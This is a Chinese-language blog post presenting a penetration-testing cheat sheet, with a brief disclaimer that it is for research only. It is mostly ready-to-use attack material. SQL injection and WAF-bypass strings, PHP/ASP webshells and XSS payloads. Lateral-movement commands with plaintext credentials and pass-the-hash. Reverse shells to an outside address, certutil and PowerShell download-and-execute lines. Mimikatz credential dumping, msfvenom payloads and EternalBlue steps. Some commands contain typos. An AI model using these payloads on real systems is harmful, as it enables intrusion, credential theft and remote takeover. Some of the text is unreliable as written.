本文章仅作技术研究，请勿用作非法途径!

Web

SQL Inject

联合查询爆显示位

union select 1,user(),3

联合查询爆表名

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

联合查询爆字段名

union select 1,2,group_concat(column_name) from information_schema.column where table_schema='users' --+

联合查询爆字段值

union select 1,username,password from `key` --+

万能密码

admin' or'1'='1'

布尔盲注测试

and length(database())=4 --+

时间盲注测试

or if(ascii(substr(database(),1,1))>0,sleep(1),1) --+

floor报错注入

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

extractvalue报错注入

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

info outfile写文件

select '<?php phpinfo();?>' into outfile '/var/www/html'

load_file 读文件

union select load_file('/etc/passwd')

access

and (select count(*) from msysobjects)>0 and 1=1

mssql

and (select count(*) from sysobjects)>0 and 1=1

oracle

and (select count(*) from sys.user_tables)>0 and 1=1

Bypass

大小写

uNIoN sELecT 1,2,3

空格绕过

/**/%55nION/**/%53ElecT/**/1,2,3Select(user())from test where id=1 and 1=1;

内联注释

/*!UNION*/+/*!SELECT*/+1,2,3/*UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM/*information_schema*/.tables /*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()---

双写绕过

UNIunionON+SELselectECT+1,2,3

编码绕过

• URLEncode编码：or 1=1即%6f%72%20%31%3d%31
• ASCII编码： Test：CHAR(84)+CHAR(101)+CHAR(115)+CHAR(116)
• 十六进制编码：SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

PHP伪协议

php伪协议，以base64编码输出

php://filter/read=convert.base64-encode/resource=index.php

php伪协议，以base64编码写入

php://filter/write=convert.base64-decode/resource=xx.php

data协议命令执行

data:text/plain,<?php system('whoami');?>

一句话木马

php

<?php eval($_POST['pwd']);?>

asp

<%execute(request('pwd'))%>

aspx

<% @Page Language='jscript'%><%eval(Request.Item['pwd'],'unsafe');%>

生成图片马

copy 1.jpg /b + 1.php /b shell.php

XSS Payload

<img src=1 onerror=alert(/xss/)>

<script>alert(/xss/)</script>

<script>prompt(/xss/)</script>

<script>alert(document.cookie)</script

' onmouseover='alert(/xss/)

" onclick="alert(/xss/)

javascript:alert(/xss/)

<body onload=alert(/xss/)>

<body background="javascript:alert(/xss/)">

Python沙箱逃逸

python2沙箱逃逸

"".__class__.__mro__[-1].__subclasses__()[71].__init__.globales__['os'].system('ls')

python3沙箱逃逸

"".__class__.__mro__[-1].__subclasses__()[117].init__.globales['system']('ls')

PHP命令执行

<?php $cmd=$_POST['cmd'];@exec($cmd,$return);var_dump($return);?>

<?php $last_line = system("ls",$retval);echo $last_line;?>

<?php $output = passthru("ls -la");echo "<pre>$output</pre>";?>

<?php $output = shell_exec('ls -la');echo "<pre>$output</pre>";?>

<?php $fd = popen("whoami", 'r');$ret = fgets($fd);print($ret);?>

<?php 
  $command=$_GET['a'];
  $wsh = new COM('WScript.shell');
  $exec = $wsh->exec("cmd /c".$command);
  $stdout = $exec->StdOut();
  $stdoutput = $stdout->ReadAll();
  echo $stdoutput
?>

PHP代码执行

<?php @eval($_POST['cmd']);?>

<?php @assert($_POST['cmd']);?>

<?php echo "{${phpinfo()}}";?>

<?php call_user_func("assert",$_POST['cmd']);?>

<?php preg_replace("/test/e",$_POST['cmd'],"just test");?>

<?php $func = create_function('',$_POST['cmd']);$func;?>

<?php $cmd=$_POST['cmd'];$array[0]=$cmd;call_user_array("assert",$array);?>

<?php $cmd=$_POST['cmd'];$array1=array($cmd);$func=$_GET['func'];array_filter($array1,$func);?>

<?php $func=$_GET['func'];$cmd=$_POST['cmd'];$ayyar[0]=$cmd;$new_array=array_map($func,$array);echo $new_array;?>

横向渗透

WMIC

wmic /node:10.10.10.201 /user:administrator /password:hetianlab.com process call create "cmd.exe /c ipconfig"

IPC + Schtasks

net use \\10.10.10.201\c$ /user:administrator "hetianlab.com"
copy c:\windows\temp\59.exe \\10.10.10.201\c$
schtasks /create /s 10.10.10.201 /u de1ay\administrator /p "hetianlab.com" /sc MINUTE /mo 1 /tn test2 /tr "c:\59.exe"
schtasks /run /s 10.10.10.201 /u de1ay\administrator /p "hetianlab.com" /tn test2
schtasks /delete /tn At1 /s 10.10.10.201 /u administrator /p hetianlab.com

IPC + AT

net use \\10.10.10.201\c$ /user:administrator "hetianlab.com"
copy 59.exe \\10.10.10.201\c$
at \\10.10.10.201 19:08 c:\59.exe

Smbexec

smbexec.exe heetian\Administrator:hetianlab.com@10.10.10.201

Psexec

PsExec.exe \\192.168.10.201 -h heetian\Administrator -p hetianlab.com -s cmd.exe -accepteula

PTH

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:10.10.10.201 /ntlm:579110c49145015c47ecd267657d3174" exit
wmiexec.exe -hashes aad3b435b51404eeaaad3b435b51404ee:579110c49145015c47ecd267657d3174 administrator@10.10.10.201 "whoami"
smbexec.exe -hashes aad3b435b51404eeaaad3b435b51404ee:579110c49145015c47ecd267657d3174 administrator@10.10.10.201

Wmiexec

wmiexec.exe -share admin$ administrator:hetianlab.exe@10.10.10.201

渗透测试

反弹shell

Bash

bash -i >& /dev/tcp/192.168.1.1/3344 0>&1
0<&196;exec 196<>/dev/tcp/192.168.1.1/3344; bash <&196 >&196 2>&196

NC

nc -e /bin/bash 192.168.1.1 3344
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.1 3344 > /tmp/f

PHP

php -r '$sock=fsockopen("192.168.1.1",3344);exec("/bin/bash -i <&3 >&3 2>&3");'

Telnet

telnet 192.168.1.1 8080 | /bin/bash | telnet 192.168.1.1 9090

crontab

* * * * * /bin/bash -i >& /dev/tcp/192.168.1.1/1234 0>&1

Socat

socat TCP:192.168.1.1:3344 EXEC:bash
socat TCP:192.168.1.1:3344 EXEC:"bash -li",pty,stderr,setsid,sigint,sane

获得伪终端

python -c 'import pty;pty.spawm("/bin/bash")'

信息收集

dig @223.5.5.5 hetianlab.com -t A
nslookup hetianlab.com 223.5.5.5
nmap -sn -Pn hetianlab.com --script hostmap-crtsh
whois hetianlab.com

site:hetianlab.com web
inurl:login
intext:蚁景网安学院
intitle:后台登录
filetype:xls 身份证

文件传输

bitsadmin下载文件

bitsadmin /transfer lan http://192.168.1.2/1.hta C:\temp\1.hta

certutil下载文件并执行

certutil.exe -urlcache -split -f http://192.168.1.2/shell.exe shell.exe & shell.exe

certutil清除缓存

certutil.exe -urlcache -split -f http://192.168.1.2/shell.exe delete

powershell下载文件

powershell -c "$p=new-object system.net.webclient;$p.DownloadFile('http://192.168.1.2/1.hta','1.hta')"
powershell.exe (new-object system.net.webclient).downloadfile('http://192.168.1.2/1.hta','1.hta')
powershell Invoke-WebRequest -uri "http://192.168.1.2/1.hta" -OutFile "$env:temp\1.hta"

wget

wget http://192.168.1.2/1.sh
wget -O x.sh http://192.168.1.2/1.sh

curl

curl -o x.hta http://192.168.1.2/1.sh
curl -O http://192.168.1.2/1.sh

PHP

php -r 'file_put_contents("lan.hta",file_get_contents("http://192.168.1.2/1.sh"));'

Python

python2 -c "import urllib2;u=urllib2.urlopen('http://192.168.1.2/1.hta');f=open('c:\\temp\\win.hta','w');f.write(u.read());f.close"
python3 -c "import urllib.request;u=urllib.request.urlopen('http://192.168.1.2/1.hta');f=open('c:\\temp\\win.hta','w');f.write(u.read().decode('utf-8'))"

Ruby

ruby -e 'require "net/http";Net::HTTP.start("192.168.1.227") { [http]r=http.get("/1.sh");open("/root/x.sh","wb") {[file]file.write(r.body)}}'

Perl

perl -MLWP::Simple -e 'getstore ("http://192.168.1.2/1.sh", "1.sh")'

Powershell加载远程脚本

powershell -nop -w hidden -exec bypass -c "IEX (New-Object New.WebClient).DownloadString('http://192.168.1.2/shell.ps1');shell.ps1";

工具

Mimikatz

启动mimikatz

mimikatz.exe
# privilege::debug
# log c:\temp\mimikatz.log

获取登录账号的明文密码和Hash值

# sekurlsa::logonpasswords

备份注册表中的SYSTTEM & SAM hive

C:\> reg save HKLM\SYSTEM system.hiv
C:\> reg save HKLM\SAM sam.hiv

mimikatz获取hashs

# lsadump::sam /system:system.hiv /sam:sam.hiv

读取从lsass进程中保存文件里的明文密码

# sekurlsa::minidump lsass.dump

NMAP

基础扫描

nmap -A -T4 192.168.1.1

存活主机探测

nmap -sP 192.168.1.1/24

全端口扫描

nmap -sS -v -T4 -Pm -p- 192.168.1.1

系统扫描

nmap -O -T4 -Pn -oG OSDetect 192.168.1.1

服务版本检测

nmap -sV -T4 -Pn -oG ServiceDetect 192.168.1.1

waf识别

nmap -p80,443 --script http-waf-detect 192.168.1.1
nmap -p80,443 --script http-waf-fingerprint 192.168.1.1

Msfvenom

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o /tmp/shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f macho > shell.macho

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<Port> -f raw > shell.sh

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.php

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<Port> -f raw > shell.py

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<Port> -f raw > shell.pl

PowerShell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh > shell.ps1

Metasploit

msfconsole

msf > search eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(...) > set RHOSTS 192.168.1.1
msf exploit(...) > exploit

版权属于：DeepFal

本文链接：https://blog.deepfal.cn/index.php/archives/929/

转载时须注明出处及本声明